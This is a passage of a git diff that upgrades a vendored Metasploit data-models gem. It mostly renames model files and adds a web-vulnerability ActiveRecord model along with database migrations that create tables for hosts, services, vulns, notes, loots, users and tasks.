rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/profile.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/report_template.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/route.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/service.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/session_event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/task.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/user.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/vuln_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_page.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/web_site.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb
new file mode 100755
index 0000000000..4577818842
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb
@@ -0,0 +1,144 @@
+# A Web Vulnerability found during a web scan or web audit.
+#
+# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that
+# your patches are reloaded on each request in development mode for your Rails application.
+#
+# @example extending Mdm::WebVuln
+# # config/initializers/mdm_web_vuln.rb
+# ActiveSupport.on_load(:mdm_web_vuln) do
+# def confidence_percentage
+# "#{confidence}%"
+# end
+# end
+class Mdm::WebVuln < ActiveRecord::Base
+ #
+ # CONSTANTS
+ #
+
+ # A percentage {#confidence} that the vulnerability is real and not a false positive. 0 is not allowed because there
+ # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding.
+ CONFIDENCE_RANGE = 1 .. 100
+
+ # Allowed {#method methods}.
+ METHODS = [
+ 'GET',
+ # XXX I don't know why PATH is a valid method when it's not an HTTP Method/Verb
+ 'PATH',
+ 'POST'
+ ]
+
+ # {#risk Risk} is rated on a scale from 0 (least risky) to 5 (most risky).
+ RISK_RANGE = 0 .. 5
+
+ #
+ # Associations
+ #
+
+ belongs_to :web_site, :class_name => 'Mdm::WebSite'
+
+ #
+ # Attributes
+ #
+
+ # @!attribute [rw] blame
+ # Who to blame for the vulnerability
+ #
+ # @return [String]
+
+ # @!attribute [rw] category
+ # Category of this vulnerability.
+ #
+ # @return [String]
+
+ # @!attribute [rw] confidence
+ # Percentage confidence scanner or auditor has that this vulnerability is not a false positive
+ #
+ # @return [Integer] 1% to 100%
+
+ # @!attribute [rw] description
+ # Description of the vulnerability
+ #
+ # @return [String, nil]
+
+ # @!attribute [rw] method
+ # HTTP Methods for request that found vulnerability. 'PATH' is also allowed even though it is not an HTTP Method.
+ #
+ # @return [String]
+ # @see METHODS
+
+ # @!attribute [rw] name
+ # Name of the vulnerability
+ #
+ # @return [String]
+
+ # @!attribute [rw] path
+ # Path portion of URL
+ #
+ # @return [String]
+
+ # @!attribute [rw] payload
+ # Web audit payload that gets executed by the remote server. Used for code injection vulnerabilities.
+ #
+ # @return [String, nil]
+
+ # @!attribute [rw] pname
+ # Name of parameter that demonstrates vulnerability
+ #
+ # @return [String]
+
+ # @!attribute [rw] proof
+ # String that proves vulnerability, such as a code snippet, etc.
+ #
+ # @return [String]
+
+ # @!attribute [rw] query
+ # The GET query.
+ #
+ # @return [String]
+
+ # @!attribute [rw] request
+ #
+ # @return [String]
+
+ # @!attribute [rw] risk
+ # {RISK_RANGE Risk} of leaving this vulnerability unpatched.
+ #
+ # @return [Integer]
+
+ #
+ # Validations
+ #
+
+ validates :category, :presence => true
+ validates :confidence,
+ :inclusion => {
+ :in => CONFIDENCE_RANGE
+ }
+ validates :method,
+ :inclusion => {
+ :in => METHODS
+ }
+ validates :name, :presence => true
+ validates :path, :presence => true
+ validates :params, :presence => true
+ validates :pname, :presence => true
+ validates :proof, :presence => true
+ validates :risk,
+ :inclusion => {
+ :in => RISK_RANGE
+ }
+ validates :web_site, :presence => true
+
+ #
+ # Serializations
+ #
+
+ # @!attribute [rw] params
+ # Parameters sent as part of request
+ #
+ # @return [Array>] Array of parameter key value pairs
+ serialize :params, MetasploitDataModels::Base64Serializer.new
+
+ ActiveSupport.run_load_hooks(:mdm_web_vuln, self)
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_request.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/wmap_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/app/models/mdm/workspace.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/bin/mdm_console
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/console_db.yml
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb
new file mode 100755
index 0000000000..efda742476
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb
@@ -0,0 +1,79 @@
+class CreateTables < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :hosts do |t|
+ t.timestamp :created
+ t.string :address, :limit => 16 # unique
+ t.string :address6
+ t.string :mac
+ t.string :comm
+ t.string :name
+ t.string :state
+ t.string :info, :limit => 1024
+ t.string :os_name
+ t.string :os_flavor
+ t.string :os_sp
+ t.string :os_lang
+ t.string :arch
+ end
+
+ add_index :hosts, :address, :unique => true
+
+ create_table :clients do |t|
+ t.integer :host_id
+ t.timestamp :created
+ t.string :ua_string, :limit => 1024, :null => false
+ t.string :ua_name, :limit => 64
+ t.string :ua_ver, :limit => 32
+ end
+
+ create_table :services do |t|
+ t.integer :host_id
+ t.timestamp :created
+ t.integer :port, :null => false
+ t.string :proto, :limit => 16, :null => false
+ t.string :state
+ t.string :name
+ t.string :info, :limit => 1024
+ end
+
+ create_table :vulns do |t|
+ t.integer :host_id
+ t.integer :service_id
+ t.timestamp :created
+ t.string :name
+ t.text :data
+ end
+
+ create_table :refs do |t|
+ t.integer :ref_id
+ t.timestamp :created
+ t.string :name, :limit => 512
+ end
+
+ create_table :vulns_refs, :id => false do |t|
+ t.integer :ref_id
+ t.integer :vuln_id
+ end
+
+ create_table :notes do |t|
+ t.integer :host_id
+ t.timestamp :created
+ t.string :ntype, :limit => 512
+ t.text :data
+ end
+
+ end
+
+ def self.down
+ drop_table :hosts
+ drop_table :clients
+ drop_table :services
+ drop_table :vulns
+ drop_table :refs
+ drop_table :vulns_refs
+ drop_table :notes
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb
new file mode 100755
index 0000000000..e0d37098c2
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb
@@ -0,0 +1,35 @@
+class AddWmapTables < ActiveRecord::Migration
+ def self.up
+ create_table :wmap_targets do |t|
+ t.string :host # vhost
+ t.string :address, :limit => 16 # unique
+ t.string :address6
+ t.integer :port
+ t.integer :ssl
+ t.integer :selected
+ end
+
+ create_table :wmap_requests do |t|
+ t.string :host # vhost
+ t.string :address, :limit => 16 # unique
+ t.string :address6
+ t.integer :port
+ t.integer :ssl
+ t.string :meth, :limit => 32
+ t.text :path
+ t.text :headers
+ t.text :query
+ t.text :body
+ t.string :respcode, :limit => 16
+ t.text :resphead
+ t.text :response
+ t.timestamp :created
+ end
+ end
+
+ def self.down
+ drop_table :wmap_targets
+ drop_table :wmap_requests
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb
new file mode 100755
index 0000000000..9afe792ef5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb
@@ -0,0 +1,36 @@
+class AddWorkspaces < ActiveRecord::Migration
+
+ def self.up
+ create_table :workspaces do |t|
+ t.string :name
+ t.timestamps
+ end
+
+ change_table :hosts do |t|
+ t.integer :workspace_id, :required => true
+ end
+
+ remove_index :hosts, :column => :address
+
+ #
+ # This was broken after 018_add_workspace_user_info was introduced
+ # because of the new boundary column. For some reason, the
+ # find_or_create_by_name that .default eventually calls here tries to
+ # create a record with the boundary field that doesn't exist yet.
+ # See #1724
+ #
+ #w = Msf::DBManager::Workspace.default
+ #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id]
+ end
+
+ def self.down
+ drop_table :workspaces
+
+ change_table :hosts do |t|
+ t.remove :workspace_id
+ end
+
+ add_index :hosts, :address, :unique => true
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb
new file mode 100755
index 0000000000..3aedba8e20
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb
@@ -0,0 +1,20 @@
+class MoveNotes < ActiveRecord::Migration
+ def self.up
+ # Remove the host requirement. We'll add the column back in below.
+ remove_column :notes, :host_id
+ change_table :notes do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.integer :service_id
+ t.integer :host_id
+ end
+ end
+
+ def self.down
+ remove_column :notes, :workspace_id
+ remove_column :notes, :service_id
+ change_table :notes do |t|
+ t.integer :host_id, :null => false
+ end
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb
new file mode 100755
index 0000000000..a89d75281e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb
@@ -0,0 +1,16 @@
+class AddEventsTable < ActiveRecord::Migration
+ def self.up
+ create_table :events do |t|
+ t.integer :workspace_id
+ t.integer :host_id
+ t.timestamp :created_at
+ t.string :user
+ t.string :name
+ t.string :info
+ end
+ end
+ def self.down
+ drop_table :events
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb
new file mode 100755
index 0000000000..bd34021e11
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb
@@ -0,0 +1,58 @@
+class ExpandInfo < ActiveRecord::Migration
+ def self.up
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info, :limit => 4096
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :vulns, :data
+ change_table :vulns do |t|
+ t.string :data, :limit => 4096
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 4096
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 4096
+ end
+ end
+
+ def self.down
+
+ remove_column :events, :info
+ change_table :events do |t|
+ t.string :info
+ end
+
+ remove_column :notes, :data
+ change_table :notes do |t|
+ t.string :data, :limit => 1024
+ end
+
+ remove_column :hosts, :info
+ change_table :hosts do |t|
+ t.string :info, :limit => 1024
+ end
+
+ remove_column :vulns, :data
+ change_table :hosts do |t|
+ t.string :data, :limit => 1024
+ end
+
+ remove_column :services, :info
+ change_table :services do |t|
+ t.string :info, :limit => 1024
+ end
+
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb
new file mode 100755
index 0000000000..446a83aa29
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb
@@ -0,0 +1,26 @@
+
+# Adds 'created_at' and 'updated_at' columns to every primary table.
+#
+class AddTimestamps < ActiveRecord::Migration
+
+ @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests]
+ @@TABLES_NEEDING_CREATED_AT = [:wmap_targets]
+ @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets]
+
+ def self.up
+ @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at }
+
+ @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime }
+
+ @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime }
+ end
+
+ def self.down
+ @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created }
+
+ @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at }
+
+ @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at }
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb
new file mode 100755
index 0000000000..32786f8cfb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb
@@ -0,0 +1,20 @@
+class AddLoots < ActiveRecord::Migration
+
+ def self.up
+ create_table :loots do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.integer :host_id
+ t.integer :service_id
+ t.string :ltype, :limit => 512
+ t.string :path, :limit => 1024
+ t.text :data
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :loots
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb
new file mode 100755
index 0000000000..4cc32cc6e4
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb
@@ -0,0 +1,16 @@
+class CreateUsers < ActiveRecord::Migration
+ def self.up
+ create_table :users do |t|
+ t.string :username
+ t.string :crypted_password
+ t.string :password_salt
+ t.string :persistence_token
+
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :users
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb
new file mode 100755
index 0000000000..0aad1366fb
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb
@@ -0,0 +1,10 @@
+class AddLootsCtype < ActiveRecord::Migration
+ def self.up
+ add_column :loots, :content_type, :string
+ end
+
+ def self.down
+ remove_column :loots, :content_type
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb
new file mode 100755
index 0000000000..f99dd68d32
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb
@@ -0,0 +1,16 @@
+class AddAlertFields < ActiveRecord::Migration
+ def self.up
+ add_column :notes, :critical, :boolean
+ add_column :notes, :seen, :boolean
+ add_column :events, :critical, :boolean
+ add_column :events, :seen, :boolean
+ end
+
+ def self.down
+ remove_column :notes, :critical
+ remove_column :notes, :seen
+ remove_column :events, :critical
+ remove_column :events, :seen
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb
new file mode 100755
index 0000000000..2f16e8b70d
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb
@@ -0,0 +1,19 @@
+class AddReports < ActiveRecord::Migration
+
+ def self.up
+ create_table :reports do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :created_by
+ t.string :rtype
+ t.string :path, :limit => 1024
+ t.text :options
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :reports
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb
new file mode 100755
index 0000000000..39004c821e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb
@@ -0,0 +1,24 @@
+class AddTasks < ActiveRecord::Migration
+
+ def self.up
+ create_table :tasks do |t|
+ t.integer :workspace_id, :null => false, :default => 1
+ t.string :created_by
+ t.string :module
+ t.datetime :completed_at
+ t.string :path, :limit => 1024
+ t.string :info
+ t.string :description
+ t.integer :progress
+ t.text :options
+ t.text :error
+ t.timestamps
+ end
+ end
+
+ def self.down
+ drop_table :tasks
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb
new file mode 100755
index 0000000000..bf01c7afb8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb
@@ -0,0 +1,10 @@
+class AddTasksResult < ActiveRecord::Migration
+ def self.up
+ add_column :tasks, :result, :text
+ end
+
+ def self.down
+ remove_column :tasks, :result
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb
new file mode 100755
index 0000000000..616d8c96be
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb
@@ -0,0 +1,12 @@
+class AddLootsFields < ActiveRecord::Migration
+ def self.up
+ add_column :loots, :name, :text
+ add_column :loots, :info, :text
+ end
+
+ def self.down
+ remove_column :loots, :name
+ remove_column :loots, :info
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb
new file mode 100755
index 0000000000..7934a0f423
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb
@@ -0,0 +1,16 @@
+class RenameUser < ActiveRecord::Migration
+ def self.up
+ remove_column :events, :user
+ change_table :events do |t|
+ t.string :username
+ end
+ end
+
+ def self.down
+ remove_column :events, :username
+ change_table :events do |t|
+ t.string :user
+ end
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb
new file mode 100755
index 0000000000..1e2827801e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb
@@ -0,0 +1,10 @@
+class AddHostPurpose < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :purpose, :text
+ end
+
+ def self.down
+ remove_column :hosts, :purpose
+ end
+end
+
